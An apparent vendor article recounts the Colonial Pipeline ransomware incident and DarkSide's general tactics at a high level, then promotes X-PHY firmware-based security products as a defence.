The Colonial Pipeline Case
Early May this year, Colonial Pipeline received notification of a ransomware attack when an employee found a message from hackers in one of the server room computers. Not long after receiving the ransom note, the company CEO Joseph Blount decided to pay off the ransom so that they can reclaim their system and get their service provision going after an unprecedented halt of the activities caused by the disrupted system. The CEO made the hard decision of paying the hackers $4.4 million with the boss stating that they had to take that decision because they did not understand how badly their system was compromised and hence not knowing the exact amount of time it would have taken to restore the system and get the pipeline back on track.
Mr. Blount defended what he termed as a bold and the only plausible choice he had left, given the criticality of the infrastructure they were running. The famed Colonial Pipeline is known for its enormous contribution to the economic continuation in the East Coast providing a rough estimate of over 45% of the fuel supply in the area. Acknowledging that it was a controversial decision he undertook, Mr. Blount tries to explain to the public the massive breach that could have further be caused by the elongated time to pay the ransom to the hackers.
How Colonial Attack was executed
The hacking mechanism used by the alleged hacking group Darkside is still largely speculation, with experts believing that the attack could be as a result of successful social engineering (phishing attacks) or brute force attacks that resulted in the hackers assuming administrative privileges and hence taking the whole system down. The steps below illustrate the mechanism of Darkside attack;
1: Attack Initiation
The first step involves gaining access to a firm’s networks and systems through methods such as malicious phishing links, SQL-injections, and brute force password cracking methods. In the Colonial Pipeline Attack, it is believed that phishing was utilized to gain access credentials.
2. Gaining Access
Until now, cybersecurity experts have unearthed three sets of unique tactics that the attackers leverage to gain access to secure systems.
- Downloading and making use of TeamViewer.
- Making use of command and control (CS) infrastructure
- Backdoor methods such as keynoting, executing of .NET commands and taking
3. Ransomware Installation
After gaining privileged administrative access, the attackers make use of CertUtil.exe and PowerShell.exe in downloading and executing the Darkside code. In the process, a copy of the malware is saved in the infected device.
4. Privilege Escalation
To install the ransomware, the three threat actors engage in an escalation of privilege. This is done using CVE-2020-1472, Mimikatz, and Local Security Authority Subsystem (LSASS).
5. Files Encryption and Exfiltration of Data
Because they have already gained administrative privileges and downloaded the malicious code, they start the process of sensitive data collection. After they have collected all the needed data that they want to hold ransom, they encrypt it with the use of the copy of ransomware initially stored in a shared folder of the affected device. This gives them the ability to spread malicious code all over the organization network and system in form of scheduled tasks.
DarkSide actors gained access to Colonial Pipeline system by use of administrative access credentials. Existing software defenses are only designed to protect against known threats, thus use of valid access credentials could not be detected as a threat. After gaining privileged administrative access, the attackers make used of CertUtil.exe and PowerShell.exe to download and execute the Darkside code. In this process, a copy of the malware is saved in the infected device. Once the Darkside code is injected, the XPHY Guard will immediately detect it as malicious due to the data access behavior.
Guardian Pro-X and Security Scout features within the X-Guard Threat Lock use AI at the firmware level to survey a large amount of data in real-time to detect any anomalies in data access patterns. In this case, the extraction of data and encryption of files could have shown a disparity in the normal disk access pattern thus classified as malicious. As such, X-PHY Factor Encryption lock feature could trigger data lockdown to prevent the attacker from accessing it and in the process activate the Keycode 2-factor. At this point, X-PHY enters safe mode and data on the disk cannot be accessed until multidimensional authentication (MDA) codes are provided.